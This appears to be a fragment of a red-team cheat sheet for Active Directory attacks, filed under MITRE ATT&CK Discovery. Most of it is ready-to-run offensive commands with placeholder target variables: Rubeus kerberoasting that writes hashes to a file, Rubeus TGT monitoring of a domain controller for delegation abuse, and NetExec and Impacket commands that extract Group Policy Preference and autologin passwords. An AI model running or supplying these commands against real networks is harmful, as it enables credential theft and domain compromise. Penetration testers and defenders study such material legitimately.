Mitre Att&ck Entreprise: TA0007 - Discovery
Menu
Tools
| _repo | _last_push | _stars | _watch | _language |
|---|
dacl
credit: thehacker.repices
kerberos
kerberoasting
Rubeus.exe -args kerberoast /user:$ztarg_user_name /simple /rc4opsec /outfile:hashes.txt
delegations
# KUD server: monitor the TGT
Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap
## <a name='vuln_user_accounts_dormant'></a>vuln_user_accounts_dormant
```powershell
pwdLastSet
shoot-gpo
gpp-password
# cme
netexec smb $zdom_dc_ip -u $ztarg_user_name -p $ztarg_user_pass -M gpp_pasword
netexec smb $zdom_dc_ip -u $ztarg_user_name -p $ztarg_user_pass -M gpp_autologin
# impacket
Get-GPPPassword.py $zz